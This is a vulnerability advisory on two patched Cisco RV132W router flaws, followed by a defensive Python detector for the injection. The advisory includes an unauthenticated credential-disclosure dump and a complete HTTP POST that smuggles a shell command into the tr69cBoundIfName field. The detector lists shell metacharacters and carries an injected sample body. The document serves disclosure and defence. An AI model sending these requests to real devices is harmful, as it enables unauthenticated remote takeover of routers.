SSD Advisory – Hack2Win – Cisco RV132W Multiple Vulnerabilities
Credit to Author: SSD / Maor Schwartz | Date: Sun, 11 Feb 2018 06:10:03 +0000
Want to get paid for a vulnerability similar to this one?
Contact us at: sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom
See our full scope at: https://blogs.securiteam.com/index.php/product_scope
Vulnerabilities Summary
The following advisory describes two (2) vulnerabilities found in Cisco RV132W Wireless N VPN version 1.0.1.8.
The Cisco RV132W Wireless-N ADSL2+ VPN Router is “easy to use, set up, and deploy. This flexible router offers great performance and is suited for small or home offices (SOHO) and smaller deployments.”
The vulnerabilities found are:
- Information Disclosure That Leads to Password Disclosure
- Unauthenticated WAN Remote Code Execution
Credit
A security researcher from NHSC has reported these vulnerabilities to Beyond Security's SecuriTeam Secure Disclosure program.
Vendor response
Cisco were informed of the vulnerabilities and released patches to address them: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x
CVE: CVE-2018-0125 / CVE-2018-0127
Vulnerabilities details
Information Disclosure that Leads to Password Disclosure
User-controlled input is not sufficiently filtered; an unauthenticated user can access the following page:
The output includes the admin SSH password (base64-encoded):
```xml
<AdminUserName>redalert</AdminUserName>
<AdminPassword>61eac78956b08e9b7c499691eddbe2e2</AdminPassword>
<AdminPasswordHash>(null)</AdminPasswordHash>
<AdminCliEnable>TRUE</AdminCliEnable>
<SupportUserName>support</SupportUserName>
<SupportPassword>support</SupportPassword>
<SupportPasswordHash>(null)</SupportPasswordHash>
<SupportCliEnable>TRUE</SupportCliEnable>
<UserUserName>user</UserUserName>
<UserPassword>user</UserPassword>
<UserPasswordHash>(null)</UserPasswordHash>
<UserCliEnable>TRUE</UserCliEnable>
<logintimeout>30</logintimeout>
<SetAdminUser>TRUE</SetAdminUser>
<SetGuestUser>FALSE</SetGuestUser>
<EnableAdminUser>TRUE</EnableAdminUser>
<EnableGuestUser>FALSE</EnableGuestUser>
<GuestUserName>guest</GuestUserName>
<GuestPassword>574ea313a3b02211d193d01606942111</GuestPassword>
<GuestPasswordHash>(null)</GuestPasswordHash>
<GuestCliEnable>TRUE</GuestCliEnable>
<GuestUserIsInUse>FALSE</GuestUserIsInUse>
<FirstLogin>TRUE</FirstLogin>
<GuestLoginTimeout>30</GuestLoginTimeout>
<loginchecked>0</loginchecked>
<sshpass>cmVkYWxlcnQxMzIkAA==</sshpass>
```
Decoding: “cmVkYWxlcnQxMzIkAA==” base64-decodes to “redalert132$”, which is the password of our test unit.
Unauthenticated WAN Remote Code Execution
User-controlled input is not sufficiently filtered; an unauthenticated user can access the following page:
```
http://[TARGET_IP]/tr69cfg.cgi
```
By sending a POST request with a modified tr69cBoundIfName= parameter, an unauthenticated user can execute arbitrary code on the victim's router:
```http
POST /tr69cfg.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 627
Referer: http://192.168.1.1/tr69cfg.cgi
Connection: close
Upgrade-Insecure-Requests: 1

submit_button=Basic_config&tr69cEnable=1&tr69cInformEnable=1&ipvEnable=0&tr69cInformInterval=300&tr69cAcsURL=http%3A%2F%2F192.168.1.1&tr69cAcsUser=admin&tr69cAcsPwd=admin&tr69cConnReqUser=admin&tr69cConnReqPwd=admin&tr69cConnReqPort=7547&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0&tr69cAcsCert=&tr69cCpeCert=&downloadFileType=&tr69cBoundIfName=;COMMAND-TO-RUN;&tr69cBindInterface=ETH_WAN_R&tr69=on&ipv=on&inform=on&informInterval=300&httpCategory=http%3A%2F%2F&acsURL=192.168.1.1&acsUser=admin&acsPwd=admin&debug=on&FileType=on&connReqAuth=on&connReqUser=admin&connReqPwd=admin&connReqPort=7547&WANInterface=eth0.1
```
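Detection and input-validation logic for the parameter above, as an added example that is not from the advisory or from Cisco's fix: it parses the form body by hand so a ';' inside a value is kept as data (rather than treated as a separator), checks the interface-name fields of tr69cfg.cgi against an allowlist of the shape seen in legitimate values such as eth0.1 and ETH_WAN_R, and reports the shell metacharacters found, percent-encoded or not. The allowlist pattern and the sample bodies are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Assumed allowlist: legitimate interface names on the form look like
# "eth0.1" or "ETH_WAN_R" (letters, digits, dot, underscore, hyphen).
IFNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,15}$")

# Characters that let a value break out of a shell command line.
SHELL_META = set(";|&`$(){}<>\n")

# Fields of tr69cfg.cgi that carry an interface name.
IFNAME_FIELDS = ("tr69cBoundIfName", "tr69cBindInterface", "WANInterface")


def is_valid_ifname(value: str) -> bool:
    """Allowlist check a patched CGI would apply before using the value."""
    return IFNAME_RE.fullmatch(value) is not None


def parse_form(body: str) -> dict:
    """Split an x-www-form-urlencoded body on '&' only; older parse_qs
    versions also split on ';', which would hide the injected value."""
    fields = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return fields


def suspicious_ifname_fields(body: str) -> dict:
    """Map each interface field failing the allowlist to the shell
    metacharacters it contains (after percent-decoding)."""
    fields = parse_form(body)
    findings = {}
    for name in IFNAME_FIELDS:
        for value in fields.get(name, []):
            if not is_valid_ifname(value):
                findings[name] = sorted(SHELL_META & set(value))
    return findings


def scan_request(raw: str) -> dict:
    """Flag a POST to tr69cfg.cgi whose interface fields carry injection."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    if not request_line.startswith("POST ") or "/tr69cfg.cgi" not in request_line:
        return {}
    return suspicious_ifname_fields(body)


# Constructed samples: a benign form post and the injection shape from the advisory.
BENIGN = "tr69cEnable=1&tr69cBoundIfName=eth0.1&tr69cBindInterface=ETH_WAN_R&WANInterface=eth0.1"
INJECTED = "tr69cEnable=1&tr69cBoundIfName=%3BCOMMAND-TO-RUN%3B&tr69cBindInterface=ETH_WAN_R&WANInterface=eth0.1"
```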